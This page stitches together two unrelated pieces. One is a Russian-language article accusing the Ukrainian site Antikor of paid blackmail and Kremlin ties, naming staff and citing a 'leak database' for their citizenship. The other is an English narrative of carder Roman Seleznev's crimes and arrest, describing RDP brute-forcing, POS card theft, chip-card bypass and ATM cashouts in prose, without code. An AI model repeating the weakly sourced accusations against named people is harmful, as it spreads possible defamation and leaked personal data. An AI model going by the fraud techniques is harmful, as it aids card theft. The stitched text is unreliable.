Шантажисты из “про-Украинского” Антикора и российская пропаганда. Что общего?

Портал antikor.com.ua известен своими громкими расследованиями коррупции в Украине. И даже самый ленивый пиарщик знает расценки на заказные публикации в этой «богадельне», которая с 2013 года упорно поливает грязью украинских банкиров, олигархов и политиков. Продажные журналюги изначально ориантировали свои ресурсы на то, чтобы шантажировать людей публикациями и осуществлять про-российские информационные вбросы. Чаще всего материалы не содержали никаких доказательств и состояли из стандартных манипуляционных фразочек и разоблачений. Однако не долго музыка играла и сами «ярые борцы с коррупцией» оказались в центре скандала.

С началом войны на Донбассе на «Антикоре» периодически появлялась кремлевская пропаганда про «украинские карательные отряды» и другой похожий бред, который только мог прийти в голову пропагандонам. Кто это все спонсировал, учитывая, что на «Антикоре» ничего не появляется бесплатно. Можно долго озадачивать себя догадками и выстраивать связь антикорщиков с кремлевской пропагандой, но зачем гадать, когда есть факты.

Запись с сайта Антикор, обнаружена через archive.org
Еще одна запи

В 2018 году стало известно, что сервера Antikor.com.ua размещаются на территории России. Согласитесь, не самое первое место для размещения сервера украинского СМИ. Да и в самом коде страницы antikor.com.ua суффиксов .ru хватает до сих пор.

Код загружающий русскую аналитику в структуре сайта antikor.com.ua
Еще одно подтверждение связи с россией – код счетчика yadro.ru

По состоянию на декабрь 2021 года Antikor переехал на выделенный IP российского хостинга Variti, специализирующегося на защите сайтов от DDOS-атак, — 185.203.72.75.

Красным отмечены хостинги, размещенные в россии.

Необходимо отметить, что Антикор, также размещался на другом скандально-известном сервисе, предоставляемым под-ФСБшной российской компанией DDoS-Guard. DDoS-Guard также не брезгует размещать у себя ресурсы наркотических и радикальных тематик, антиукраинские и антиамериканские сайты. DDoS Guard предоставляет хостинг правительству Чечни, Министерству обороны РФ и многим другим российским ресурсам. Сам хостинг строго контролируется ФСБ. На требование прекратить размещать у себя ресурсы по торговле наркотиками в Украине, мы получили ответ о том, что сотрудники DDoS Guard не являются специалистами в психоактивных веществах и не могут судить о том, что именно продаётся на сайте.

На этом же хостинге размещался сайт вот с таким содержанием

Но это было лирическое отступление, вернемся к нашим баранам. Согласно данным Website Reports http://websitesrate.com/website-report-search/adsense-pub-id/4336163389795756 , под одним Google Ads Publisher ID (4336163389795756) вместе с Антикором работают такие сайты, как Novostiua.org, Glavk.info, Kompromat1.info и Oplatru24.ru. Правда, под Kompromat1 используется отдельный выделенный IP 185.169.155.17, который находится на серверах российского хостинга Сервиспайп. Ранее все упомянутые сайты находились на серверах российского хостинга Variti, в подсети 185.203.72.0/24.

Если пройтись по этим ресурсам, то даже слепой заметит сходства между «Антикором», «Главком» и «Компроматом». Сайты в одной цветовой гамме, одинаковые шрифты, последовательность подачи материала и даже некоторых функций меню. Но самое главное – это одна на всех троих тематика. Все три ресурса – ярые борцы с коррупцией. Только «Главком» и «Компромат» – это российские СМИ, а «Антикор» вроде как наш, украинский. В связи с этим, вся ситуация выглядит еще более подозрительной, учитывая, что владельцы портала «Антикор» имеют российское гражданство и возможные связи с ФСБ.

Для того, чтобы знать героев в лицо стоит пройтись по фамилиям, которые значатся на самом «Антикоре» в разделе «О нас».

Информация о журналистах и редакторах портала Антикор довольно ограничена. Однако, нам удалось найти следующее:

Руслан Якушев – ранее работал в ряде СМИ, в том числе в «ТаблоID» и «Обкоме».

Олег Бойко – участвовал в создании ряда проектов, в том числе в «Независимой газете» и «Грани.ру».

Михаил Соколов – работал в ряде СМИ, включая «Российскую газету», «РИА Новости» и «Звезда».

Согласно записям в нашей базе данных утечек, все трое имеют российское гражданство.

Алексей Голобудский в своей статье «Инструменты распространения российской пропаганды: живы и будут жить?» пишет про Константина Черненко, который значился в «Антикоре» главным редактором : «Черненко в профессиональных кругах более 10 лет известен как тот, кто напрямую сотрудничает с российскими клиентами. И если до войны ничего особо криминального в этом не было (просто неприятно, разве что), то с началом войны оценки кардинально поменялись».

Черненко также имеет гражданство РФ.

Упоминание портала “Антикор” в статье Артема Захарченко о российских информтропах свидетельствует о том, что этот портал известен не только в Украине, но и за ее пределами. В своей статье Захарченко говорит о том, что “Антикор” редко остается в стороне от какого-либо скандала или вброса, что может свидетельствовать о нежелании портала действовать объективно и независимо.

В то же время, участие “Антикора” в различных скандалах и обвинениях в распространении дезинформации и пропаганде выгодной для России позиции вызывает серьезные вопросы о надлежащем качестве журналистики, этичности и легитимности деятельности портала. Более того, это может быть основанием для дальнейших расследований и возможного привлечения владельцев “Антикора” к ответственности за их деятельность.

Ценник на услуги Антикор также хорошо известен. Для того, чтобы убрать “неугодную” статью с сайта, ценник варьируется от $1000 до $50000. А в 2019, когда мы только начинали наше расследование деятельности Антикор-а, через адрес BTC, который был представлен для получения оплаты за снятие неугодной статьи, прошло больше $1млн по курсу в биткоинах на тот момент.

Должен ли такой ресурс существовать, а его авторы продолжать свою антиукраинскую деятельность?

Run, Roman, Run

If you think that the richest people are the happiest ones and can buy everything — this story is just for you. Freedom, health and happiness cannot always be bought for money, as well as devoted friends or lives of loved ones. We often forget about simple, but very important things in the chase of money. Buddhists say that we die every second and our life consists of millions of choices. But it is your life and your choice, live it.

This story is about one very lucky, but very unhappy person, who made many wrong choices that dramatically affected his fate.

Marrakesh

Early in the morning of April 28, 2011, Jemaa el-Fnaa square in the center of Marrakech was teeming with people. In this traditional eastern chaos, local passers-by and tourists scurried between cars, stalls, luxury hotels and street eateries – among whom was Roman Seleznev, a plump guy with a large mole on his cheek, unshawed and slightly swollen face after yesterday’s adventures. Strong fume and lack of jacket also hinted at a funny night. Thus, Roman and his wife were denied to have a breakfast in the restaurant at the luxury hotel where they lived. So, they had to look for another place to eat and do it quick, Roman was in the middle of the fight with the strong hangover, and hangover prevailed, so he needed reinforcement in the form of whiskey shot. They went out to the square and rushed to the nearest decent eatery, located directly opposite the hotel, they had no strength to go further – the ‘tanks’ were burning and Roman wanted to get a drink much more than eat eggs Benedict for breakfast. But, as they got in, for some reason, they were not welcome here either: the waiter replied that he would serve them not earlier than in half an hour. Roman, once again, blamed himself because of sports suit he wore and yesterday’s fume and said stubbornly: ‘We’re stay’. To which the Moroccan waiter puzzlingly replied: ‘Bad idea’.

A sudden strong blast shattered the place in 10 minutes… It was terrorist attack. Total silence ensued a rolling roar, then – chaos and panic. Fire, dust, stones, fragments of bodies and blood.

Shocked, Roman came to his senses for a short time. As it turned out, terrorists left two briefcases with explosives in this cafe and blew them up using a mobile phone. 17 peoples died. Moroccan authorities blamed al-Qaeda for the attack, but the organization never claimed responsibility for it.

Roman’s wife was almost intact, but Seleznev fell into a coma, despite the fact that his father, a State Duma deputy from the Liberal Democratic Party of Russia, evacuated his son on a special medevac jet. Romans father not rely only on medicine; caring parent called the priest, who baptized Roman while he was unconscious, probably in hopes of quick Christian funerals, as even by then father owed Roman huge sum of money and expected to grab more out of Roman’s bank vault. Despite all these efforts, the doctors’ predictions were disappointing. According to them, Seleznev could die in every moment or remain in a ‘vegetable’ state until the end of his days. After such events, Roman’s wife packed up all her belongings and flew to Vladivostok. There she took money applied for US visa, which was approved, and thereafter emigrated for permanent residence to the United States. While Roman was in a coma, he received a letter from King Mohammed VI of Morocco: ‘The people of Morocco were deeply shocked and saddened to learn that you have suffered’, — the letter said.

But Roman was die hard, despite all the bad predictions, Seleznev’s inner persistence prevailed with the Lord’s help. Roman came out of a coma after two weeks. The process of recovery took him about a year; a titanium plate replaced part of his skull after numerous surgeries.

But this incident is not the most surprising twist of his biography, but rather a coincidence or one of those choices that we make every day, every second. Maybe, sometimes you need to look more closely at the signs? Especially when they say to you: ‘Bad idea’ …

nCux (Psycho) from Vladivostok

Seleznev was born in Vladivostok city on July 23, 1984. His parents divorced soon. Little Roman stayed with his mother in a communal apartment of 100 square feets. Later, she bought an apartment from her brother, where a small family of two moved to. Mother worked as a cashier in one of the district grocery stores and drank often. Roman spent most of his childhood either alone or under the care of his grandmother. In the harsh life of Vladivostok in the 2000s, nCux (transliterated russian word ‘Psikh’, means ‘Psycho’ – hereinafter be referred to as ‘Psycho’ – added by N.) – in such a manner his friends called him for his stubborn and explosive personality. He tried everything from sniffing glue to alcohol and drugs.

One day, in 2000, when Roman returned home, he discovered that his mother had drowned in the bath. On the same day, her brother came to the apartment, took away all the valuables and ordered the sixteen-year-old Seleznev to vacate the living space. The teenager went to live with his grandmother and got a job in a computer club, where he received 200 (about $5 back then) rubles per day. Later, Roman wrote in his letter to the US government, that his grandmother was his only true parent and loved one.

Just imagine that this very guy will steal his first million in a few years.

Roman had to make a lot of efforts for this to happen and his persistence prevailed despite all the hardships. He finished high school soon, made progress in mathematics, computer sciences and was even able to learn rudimentary English. Probably, due to the desire to survive, children’s idols of Psycho were Teenage Mutant Ninja Turtles. Pizza at that time was also a luxurious delicacy for a simple guy from Vladivostok.

Computer club where Seleznev worked had an internet connection; as well as his home PC. To buy it he stashed money by eating low-quality food for months. He also bought a modem and had a connection to FidoNet. Roman was interested not only in browsing and gaming, but also in ways to make money somehow. And he found it on carderplanet and carder.org forums. He quickly found his own kind there and rewrote his street name in a hacker way. And over the time, the long nCux in maHke (transliterated version of ‘Psycho in tank’ – added by N.) turned into a short nCux (Psycho).

Roman met his first accomplice with the awkward nickname Eadle on the forums. Either ‘eagle’, or ‘delayed’(which, can be understood, as “retarded” in Russian), was one of the first, who mass scanned RDP servers for simple or standard passwords or it’s total absence. It should be noted, that both Windows 2000 and Windows Server left the administrator account password blank by default and required additional steps to change it. All Eadle had to do was to write a scanner that works over the RDP protocol. At that time, not so many people had figured out the trick, so the catch was so immense, that it was totally impossible to process everything manually. A keylogger was installed on infected machines in most cases.

One day, Eadle found an account of American system Accurint on one of the infected computers, which belonged to LexisNexis corporation. The system was intended for personnel of US Internal Affairs entities, lawyers, law enforcement and licensed private investigators. It provided access to personal information of US citizens. Psycho quickly realized, that such information could be ‘useful’

not only for the police, but also for the carders. Thus, the stolen credit cards enriched with such an information were way more expensive on the black market. Such a “package” could contain almost everything that could be found about a person – social number, communal and bank bills and even, after some additional research (using ancestry research website, ridiculously also paid by stolen credit cards), mother’s maiden name. This way it was possible to get access to the victim’s bank account and understand exactly what kind of budget a victim had or even transfer funds. Soon, Psycho negotiated a deal with Eadle, made a deposit to the forum fund and became the “official” seller of carderplanet.

There were also a credit cards in addition to various records, which were enriched with data from AccurInt and sold as ‘fulki’ – ‘full info’ in English. Time passed and Seleznev had earned a reputation as a reliable seller; so, he began to earn decent money. Now he was able to rent a cozy apartment near the center of Vladivostok for himself and even bought an old ‘right-handed’ Toyota Mark II. But he wanted more… And BadB was already appearing on the horizon.

At the time they meet online, Vladislav Horohorin had already expelled from carderplanet and proved himself to be a cad, who did not always keep his word. But due to non-trivial solutions for finding credit cards in hacked credit card processing companies, and strong connections with other hackers, he was the top dog in the stolen card business. BadB was the most famous seller of stolen data after Script and Roman decided to turn to him. The questions were: how to automate the process of searching for credit cards, but the main thing is how to find ‘dumps’ – information from credit card’s magnetic stripe.

Horohorin wrote a simple program that searched for information not only on the local computer, but also went through neighboring network resources and searched for credit cards and ‘dumps’. The result did not take long: there were no more than 10,000 numbers in the ‘leaked’ dump database, but all of them belonged to clients of a luxurious Swiss hotel. Even the most ordinary cards from this base easily allowed to make purchases for several thousand of dollars. The average price of a ‘dump’ was $50 at that time. The math was simple: 10,000 x $50 = $500,000 – maybe, a little bit less. Psycho received only $60,000 for the first part of the base from BadB. Further, Roman delved into the question and understood how greedy Horohorin was. So, he offered to split the profit evenly. The dumps from this database had the effect of an nuclear explosion at the market: everything worked for thousands of dollars without a fail – ‘America’ in ‘Europe’, ‘Europe’ in ‘America’. Some cards ‘passed’ tens of thousands of euros and beat all the records. Moreover, BadB invented a way how to use chip cards, which began to appear in Europe – even in terminals that required a chip. The smart card was burned with high voltage and terminals allowed to magnetic stripe use.

But Roman did not work alone; there was also Eadle, with whom he had to share and Seleznev did it honestly. The demands had also grown: 2 room apartment on Vtoraya Rechka (translated as ‘Second River’ – district in Vladivostok city – added by N.) was quite small and old Japanese car was too slow.

And there were friends. Those friends who supported Roman in the most difficult moments of his life. They were like the brotherhood of Ninja Turtles – fought for him in school; the same friends with whom he spent all his childhood. At this very moment they did not managed to get into university and tried to find at least some job. Yes, the very ones that Roman completely forgot about. And now he had to remember them.

Bigbucks

Psycho decided: ‘Fuck this fat lying cunt’. And he stopped working with BadB. Roman had no interest in deals with Horohorin, because now he had own “click” to care about.

Seleznev launched his own service with 24/7 support. Guys rented an apartment in the center and were on duty in ICQ messenger by shifts. Nobody provided such a level of service at that time.

Many people had to deal with BadB only because there was no alternative. But with the appearance of polite and good-natured ‘online ninjas’, many carders immediately turned to them. Moreover, the service worked 24/7.

Once, a doorbell of a rented apartment rang: ‘Open the door – it’s a plumber – you are drowning the neighbors’. The one, who was ‘on shift’, opened the door, but immediately regretted it by receiving a strong blow in the face. Three men in masks burst into the apartment with rifles and shouted: ‘Lie, the fuck, down, face to the floor! I’ll kick all the shit outta you!’ The robbers not only took all the cash, holding the hostages, but also sent one of Seleznev’s employees to bring the money that were stashed at the carders’ house. They knew very well that there will be no police, after all, Seleznev’s business was illegal and police – corrupt. Calling the police might’ve caused even more problems than dealing with the gangsters.

As it turned out later, friends of Roman’s ex-girlfriend were behind the robbery – in such a way she decided to receive compensation for their break-up. Guys moved under the reliable surveillance of video cameras to the Hyundai Hotel after that robbery incident. They rented a luxurious office in the center of city.

They worked with BadB no more, but continued to communicate with him in order to get some specific information or just to eliminate the competition; the guys often drank and partied with Horohorin in three shifts. So, while BadB was in a alcoholic coma, his service was down, while one of the Seleznev’s guys was always online. It also came to quite eccentric cases with rock-star style total destruction of presidential suites, where George Bush resided once, gang-bang top Moscow prostitutes parties, and drunken losses of $ 60,000 in casinos and Forex club. At last, BadB, being a loner, counted on friendship, and Seleznev just made money with his company. C’est la vie.

Models of everything (including software for sorting of stolen card databases) were copied from Horohorin. The drunken proposals of BadB, which he might not remember in the morning, guys made a reality. So, during one a such carder feasts, BadB suggested to develop a complex software that would be loaded through vulnerabilities in browser, would find cards in attacked networks and could infect computers adjacent to the network. But Seleznev did not want to perform difficult schemes; a regular .bat file was written. In the best Soviet traditions, it was simple as a sickle and affective as a hammer. By means of net map command it identified computers on the network and searched for the contents of computers by standard windows tools, all this turned into an executable file using bat2exe utility. The most amazing thing is that even this solution worked. For every 10,000 ‘installs’, that is infections, one card database was discovered.

Psycho quickly realized that the hottest targets were POS terminals. None of his team had the slightest idea about programming, so coders were hired. Meanwhile, the ideas were boldly borrowed from BadB. Eadle also continued to work, bruteforcing simple passwords for VNC and RDP payment terminals. More sophisticated software was developed later, it searched not only for plain text, but could also intercept traffic or information exchange between the reader and the host. Seleznev bought ‘installs’, infected systems and copied all card transactions automatically through vulnerabilities in

browser. The scheme worked. By 2009, Seleznev had become one of the most successful sellers of stolen cards in the world. Roman was a respected person even on closed carder forums, despite the fact that he had neither hacking nor programming skills. In most cases, his goals were small eateries in Washington DC and other US cities. The materials of the criminal case mentioned several pizzerias, street foods with burritos, bakeries (about 3,700 enterprises in all over the years). Seleznev chose small businesses because of poor security: such enterprises do not have their own cyber defense departments and usually use bad passwords.

At that time, the discussion of ‘unlimited’ cashouts just began in private forums. The essence of attack was to hack the processing of card issuing institution. Limits were removed on these cards; the cards themselves were transferred to ‘drops’ who went to ATMs and withdrew money until the payment system operators noticed something was wrong and turned off the processing entirely. Methods of HSM attacking in order to extract PIN codes were also discussed and developed.

‘Unlimited cashouts’ occurred frequently. Faces of guys became familiar near the ATMs in Vladivostok very quickly and they had to travel to other cities to cash out: to Moscow or even to Khabarovsk. At some time the drunken gang of Seleznev and his accomplices went right into closed bank’s office and pissed all over the place and defecated into waste bin during the cash-out, despite CCTV surveillance. Bank took it as personal insult, and start to chase the gang all over Vladivostok.

Several successful methods of HSM attacking had been developed in carder community. Even if the attacks failed, you could always find the right person in the right country: the carders were everywhere. Neither Seleznev nor his team had the slightest idea how to make such attacks. But why? Hacks were made by such virtuosos as Drinkman brothers, Scorpo and M1cron. Or Pleshchuk and Tsurikov, Gucci and Liqud or Yakubets, the Aqua, they all were in touch with Seleznev. nCux and his team were content with the role of cashiers. They also distributed cash cards to trusted customers. Incomes skyrocketed and guys had to buy a cash-counting machine, because counting cash manually took a lot of time, which they already learned to use properly.

Cybernetics, automation, Bulba and rebranding

But BadB did not sit idle. The idea of creating an automatic shop for stolen credit cards had been in minds of carders for a long time. But no one believed that such a store would ‘stand’ under the onslaught of special services and carders-competitors. Nevertheless, BadB turned the dream into reality. In early 2008, Horohorin presented the first fully automated shop for stolen credit cards. It looked almost like Amazon: you could search by category and choose between card brands or different financial institutions. The US authorities claim that Horohorin ‘reflashed’ the carding market: earlier, stolen cards appeared on separate branches of forums; now, the process of stolen data exchange has been optimized and automated.

In the first version of the store, account replenishment was carried out by Webmoney, Liberty Reserve and semi-automatically through Western Union system. Horohorin approached the case with all seriousness and used in the store such emerging technologies as browser fingerprinting and supercookies. Store itself was well protected by renting whole segment of IP addresses segment in Panama, while servers physically were located in Moscow. In additions, in the case of DDoS attack, IP’s were switched in automatic mode, all this years before Cloudflare or Silk Road. Merchants uploaded cards and controlled sales in a fully automatic mode. Most carders appreciated the convenience and began to use the service actively. Some believe, that in the following years automated drug markets borrowed some of those ideas.

The glory of BadB haunted Psycho, and despite the fact, that Horohorin offered to resume cooperation many times, Seleznev went his own way. Roman deleted his former pseudonym in secret and hired a programmer who developed an automatic store similar to the BadB service. BadB’s monopoly didn’t last long, in 2009 Seleznev opened a similar service under new nicknames – Track2 and Bulba. BadB reacted immediately and furiously, especially when Seleznev’s new platform completely bought out advertising on the main carding platform of that time – carder.su forum.

Roman bribed a forum administration and took away completely all rights to advertise a sale of credit card dumps. Horohorin’s fury knew no bounds. A powerful DDoS attack immediately ensued and defuncted new track2 service. Horohorin, familiar with Webmoney service operators, also managed to lock down purses used to receive payemnts for stolen cards. Powerful DDoS and death threats through all kinds of most exotic executions followed the service all time.

BadB had no idea that his new competitor was one of the few people he considered as his friend. Ukrainian with Jewish roots was not very good at making friends, but did not lose hope to do so. The total terror from BadB side ended only when Roman accidentally got into the same bulletproof hosting operator that hosted BadB’s own infrastructure. Attacking Seleznev’s service, BadB every time actually cut the branch on which he sat himself. He also failed to bribe a hosting operator, who benefited from such a competition. The ‘platform war’ continued until the arrest of BadB in August 2010, after which Seleznev actually remained a monopolist.

But he managed to reach the level of Horohorin much later – after the terrorist attack, Roman changed his nickname to 2pac again and the site was called 2pack.cc. He positioned his resource as a platform for the best sellers of stolen data in the world, promised round-the-clock customer support and updating of the range of bank cards on a daily basis. Seleznev not only sold goods from his own sources, he was approached by hackers from all over the world who hacked Home Depot Neiman and Marcus Target. In turn, Seleznev, honestly shared and gave the best prices for their product.

Run, Roma, run!

This is how this chapter should begin…but sentiments aside. The United States Secret Service (USSS) had been monitoring the activities of Seleznev and his accomplices since 2002. On May 19, 2009, agents of FBI and US Secret Service met with representatives of FSB in Moscow after the arrest of Sergei Tsurikov in Estonia – the first detainee among the participants in RBS WorldPay hacking case. The subject of the conversation were residents of the Russian Federation who participated in hacking and cashing out of RBS, but did not travel abroad. During the exchange of information, US intelligence agents provided evidence that behind the nickname nCux is a resident of Vladivostok in a person of Roman Seleznev, who cashed himself and through his ‘drops’ about a million US dollars during the attack on RBS and shared the income with organizers of the attack.

A curious thing is that Evgenii Anikin and Viktor Pleshchuk, citizens of the Russian Federation, who were directly involved in RBS hack, ‘got off’ with a suspended sentence in 2010-2011. Although, Anikin spent a year in a pre-trial detention center in the Russian Federation. Moldovan resident in a person of Oleg Covelin, who initially gained access to the internal network of the financial institution and was also mentioned in US RBS indictment, was detained in 2016 during an international operation against the Cobalt/Carbanak group.

In June 2009, a month after the meeting between American intelligence services and FSB, Psycho announced on one of the carder forums that he was leaving the business, after which his profiles on

the forums were blocked. Interesting fact – the US criminal case indicates that it was FSB who whispered to Seleznev an information that American authorities are interested in him. As follows from investigation records, the correspondence of the carder confirms his connection with the FSB. For example, Seleznev wrote about this to Horohorin and claimed that he had a ‘roof’ from the Russian special services. Most likely, there was no protection. But there was a father with serious connections, who recently appeared in son’s life.

There is a bad luck island in the ocean…

Seleznev earned quite well. Through one of the money transfer services he cashed out about $18 million. His exact earnings are unknown, but they are in the tens of millions of dollars: carder received money through bitcoins, WebMoney and other electronic currencies. He took money in bags from Moscow to Vladivostok regularly, bought two houses in Bali, flew by plane to the islands in Indian Ocean. He photographed wads of money and expensive cars often.

Realizing that he could be tracked by US intelligence agencies, Seleznev traveled carefully. He chose countries that did not have an extradition treaty with the United States and bought tickets only at the last moment, making it difficult for the special services to track his movement. In July 2014, he traveled to the Maldives, where he rented a villa for $1,400 per night. ‘I took the most expensive villa for myself, I have my own servants’, – he wrote to one of the accomplices. After learning that Seleznev was in the Maldives, the US Security Service agents asked the US State Department to use its connections with local authorities. A head of country’s police agreed to detain the hacker after negotiations despite the absence of an extradition treaty. Then, three US special agents flew to the Maldives; they tracked the movements of Seleznev together with the police. Roman was detained on the way to the airport, from where he was supposed to fly to Moscow.

Carder was forced into a private jet and brought to the American military base in Guam within 12 hours. According to the criminal case, Seleznev had a laptop with the data of 1.7 million stolen credit card numbers, as well as passwords for accessing to servers, email accounts and financial transfers. A password for the laptop was simple – ‘Ochko123’ (meaning asshole123). There was no encryption at all.

In Guam, Seleznev appeared before a judge who confirmed the legality (in the legal field of the United States) of the arrest and further transportation of the carder to Seattle, where he was charged and sent to SeaTac federal prison with a refusal to be released on bail. The indictment, which has been pending for Roman since March 2011, included 40 counts of computer fraud, hacking, wire fraud and identity thieft. A long term of up to 38 years in prison was already on the horizon.

The arrest of nCux on American warrant was considered illegal in Moscow, and parliamentarian Valerii Seleznev claimed the arrest of his son was a kidnapping and turned to the Russian Foreign Ministry for help, where he was supported by a corresponding statement. ‘We regard what happened as another unfriendly step by Washington’, – the statement said. ‘This is not the first time that the American side ignores the 1999 bilateral Treaty on Mutual Legal Assistance in Criminal Matters and goes for the actual kidnap of a Russian citizen.’

How it was

Americans began to track the nickname nCux (Psycho) since 2002, from the very time when Roman just was starting to sell ‘full info’ on carderplanet. In May 2010, USSS special agent David Dunn took part in an Idaho-based operation in Coeur d’Alene, which was carried out at Schlotzsky’s Deli,

a well-known fast food chain over the leakage of visitors’ credit card data. He inspected a computer equipment there and found that Schlotzsky’s Deli computer was connected to a Russian IP address. David took note of this fact; many stolen credit cards surfaced on the network a few weeks later, which were traced to the place of a data breach – and this point turned out to be the computer of Schlotzsky’s Deli restaurant.

A citizen of the US, suspected of installing a malware on Schlotzsky’s chain, was arrested in connection with the leak. Detective Dunn examined the suspect’s confiscated computer and found that the guy was browsing two websites: Track2.name and Bulba.cc and chatting with a man named Track2. Further verification showed that the carder, nicknamed as Track2, has its own online shop for stolen cards and it is advertised on carder.su forum. However, it turned out that a store site, Track2.tv, was under DDoS attack, but another site – bulba.cc – was working.

The detective began to explore these sites to find out who was hiding under the aforementioned nicknames. He determined the e-mail box from which the registration took place after examining the information about the domain. Later he found other mailboxes located in the US, which were also associated with these accounts.

Eastern Virginia supported the investigation of this case with the CIS, and they began to collect warrants for information and evidence in October 2010. Detective Dunn knew, that it would take some time.

And while he was waiting for a warrant, a second hacking took place in October 21, 2010 – this time in one of the oldest Broadway Grill restaurants on Capitol Hill in Washington.

Dunn arrived in Washington and began to study the point-of-sale computers together with a local detective. They found that the servers, that stored the data of 32 thousand bank cards in the form of plain text files were very poorly protected. Information from these computers was leaked to the same IP address that was used on the computers of the Schlotzsky’s Deli restaurant in Idaho.

Detective Dunn realized that he had the opportunity to investigate the crime at home, so he had no need to travel to Virginia or Idaho and could file a case here – in western Washington.

Then the case started to get ridiculous. American services found out who was behind carding sites within the period from November 2010 to February 2011. Detective Dunn identified the Yahoo mailboxes that led to HopOne server, from where the stolen card data was forwarded to a server in Russia.

Dunn found out who owned HopOne server. He pentested the Yahoo server in order to monitor incoming and outgoing connections. He was unable to access the contents of the server at this stage, but he was able to establish the IP addresses of incoming and outgoing connections, the numbers of some ports and the amount of transferred data. He saw that this server was connected to hundreds of computers throughout the United States and many of them were installed in cafes and restaurants.

The detective discovered many hacking tools on HopOne server, which allowed to recreate the scheme of Seleznev and his team. They performed a port scan on the victims’ servers for open RDP connections. Hackers tried to break into these servers with the help of brute-force passwords. Hacked data was uploaded then to the attackers’ servers under nicknames Shmak/ Smaus with an IP address of 188.120.255.66, HopOne server with an IP of 66.36.240.69, and a Ukrainian server with an IP of 188.95.159.20. From there, the data was sent to the websites of carders – sellers under the nicknames Track2 and Bulba, which belonged to Seleznev. But this detective could only guess and look for

evidence against the Russian hacker.

Yahoo mailbox that was used to register the server for Shmak, Smaus, Track2 and Bulba was also connected to HopOne server. In addition to the above, detectives found almost 400,000 credit card numbers on HopOne. Credit card data was sorted by the IP addresses from which it was transferred. It made possible identify all the victims and collect more evidence quickly.

Gradually, the hacking chain began to reveal. And email addresses pointed to Seleznev. He used one of the Yahoo mail service addresses that received various notifications. In the mailbox [email protected], detectives found a letter about the successful registration of Roman Seleznev in PayPal payment system on September 19, 2009. It was a real fiasco. Beginning of the End.

This fact was one of the strongest evidence against Roman – in addition to the information that BadB, who was arrested earlier, already became an informant. Seleznev did not even think that user registration data was carefully stored by US payment systems in full.

And it was not just a rule, but a requirement. The data that he indicated, included his address of registration in Vladivostok, which later served to identify his personality during the arrest.

Another account [email protected] that detectives discovered was used by Roman many years ago in 2006. This e-mail box helped to set Seleznev’s connection with his first nickname nCux (Psycho). The Americans had gained access to the contents of the address and even traced how Seleznev, aka nCux, courted his wife and ordered flowers for her. The detectives found a postcard with the words: ‘You are the most beautiful, but Eva is more beautiful than you!’

Eva is the name of his daughter, which was also entered in the passport, and served as another proof of identification during the arrest. His order in online store with delivery to his home address in Vladivostok also was in this e-mail box.

After all, the most significant piece of evidence was found on HopOne’s server, where he and his accomplices kept their hacking tools. Seleznev saved to this server information about booking airline tickets for Indonesia-Singapore flight; his personal data and the number of a foreign Russian passport were also indicated in the booking form. The coincidence of the data of this order with the data of the passport served as another evidence during his arrest. It was possible to make such a ridiculous mistake in two cases. Either he was not himself, or he wanted to go to jail. There is no third option. But what’s done is done.

The Secret Service put all this evidence together. But even after that, the agents continued to look for Seleznev’s involvement in other cybercrimes. All carders are related somehow to each other. And if you remember, the investigation began from CarderPlanet carding community.

A certain Mr. Carranza associated with the forum was one of the detainees back in 2003. Correspondence between him and nCux111 was found on his computer, who provided his real data – first name, last name, home address in Vladivostok, two emails, among which was [email protected]. Carranza used this information to a plea bargain.

Detective Dunn and a representative of the prosecutor’s office had collected all this evidence and turned to the jury in 2011. They received an indictment that charged Roman Seleznev, known by 9 hacker nicknames, with committing computer crimes, fraud with bank cards and funds’ usage to hack traffic.

Michael Adams, another agent, during special undercover operation, sold “fake” US drive licenses. Those driver licenses were made in the very same office, where original ones were made. Of course, his service received best reviews for quality and speed. As a compliment Adams, as forum’s seller offered as a compliment free driver license to every prolific vendor on the market. nCux was one of them. Once again name of of Roman Seleznev was confirmed and photo obtained. After all, during Adams operation more than 100 felons were identified and captured.

Where Dreams May Come

This guy had a difficult childhood. Difficult adolescence. Luxurious youth. What kind of old age awaits for him? Probably, you’ve already understood everything. Roman Seleznev evokes conflicting emotions. You can hate him, you can admire his tenacity or you can taunt the mistakes he made. But it cannot be denied, that all the events in his life are connected with each other. And it is a question – what exactly you would have done in his place.

And there were people in Roman’s life who somehow influenced him; the people he trusted. He saw his father several times throughout his childhood. The boy was not needed by his dad, who was building his political career in the capital of Russia. But as soon as the carder had the first million, father Valerii Seleznev appeared in his life. They often met in Moscow, where Psycho periodically ‘had’ to fly in order to ‘сash out’ profits.

Almost all serious cyber сrooks remember Webmoney ‘depositories’ – first on Pyatnitskaya st., then on Sadovnicheskaya Embankment and Ordzhonikidze st. (locations in Moscow city – added by N.) Carders, such as Seleznev, took out bags full of money from these semi-basements. Roman was not the exception. Valerii contacted his son during one of a such visits and offered to meet him at his office in hotel Ukraine, where an amazing family reunion took place. After that, Roma visited his ancestor, who led him in the right path and suggested to invest in ‘long-term construction’ in Vladivostok. Roman periodically supplied his father with money – the exact amount is unknown, but parental debts ended up in millions. Once nCux was arrested, Seleznev Sr. opened a bank vault in one of banks in Vladivostok and took out several millions, that were stashed there. The fate of real estate in Bali is unknown to this day.

After the arrest of the son father initiated furious international activity: paying lawyers hundreds thousands of dollars, bribing Russian Foreign Ministry officials, expressing official protests.

It is difficult to assume, what kind of specific information Valerii Seleznev had, but his advice often seemed surreal, unless Seleznev Sr. did not want Roman to be released. In accordance with the cases of Yaroshenko and But, it was difficult to expect that the United States would behave with Seleznev in other way. Americans had 100% proof of Seleznev’s guilt. And even if in the defense case that the laptop with stolen information was planted to Seleznev, there were still Tsurikov and Horohorin. Both were closely acquainted with Psycho and his activities and they cooperated with US Government. Even the best lawyers in the world could not help. Only Roman was able help himself: make a deal with the government and admit his own guilt. This was the only way to soften the indictment.

But Roman’s father continued to assure him that there were some options like ‘Uncle Andrew’s’, a political solution to the issue and ‘international situation improvement’, all right over the prison phone. It was the play on a hand of the Americans, who insisted on the corruption of Russian politics, thereby worsened his son’s conditions of detention and relations with the US Government. Even a

fool understood that the conversation would be recorded, listened to and analyzed. There were real consequences. The case really took became political, And Roman was sent to solitary confinement. The last hopes for cooperation were lost, the Americans were furious. The situation looked doubly stupid since Seleznev already started to cooperate and told a lot, then stopped it, stalled for time, changed lawyers, turned to options for ‘Uncle Andrei’. All this under the leadership of Valerii Seleznev.

Roman initially refused to cooperate during his imprisonment, but then changed his mind and repeatedly offered his services and tried to provide valuable information. He managed to get a meeting with special agents, during which he revealed the names of many participants of carding forums from 2005 to 2014 to the authorities. But the Secret Service refused to cooperate because most of this information was already known. In addition, Roman made some statements that were false and nullified the value of cooperation.

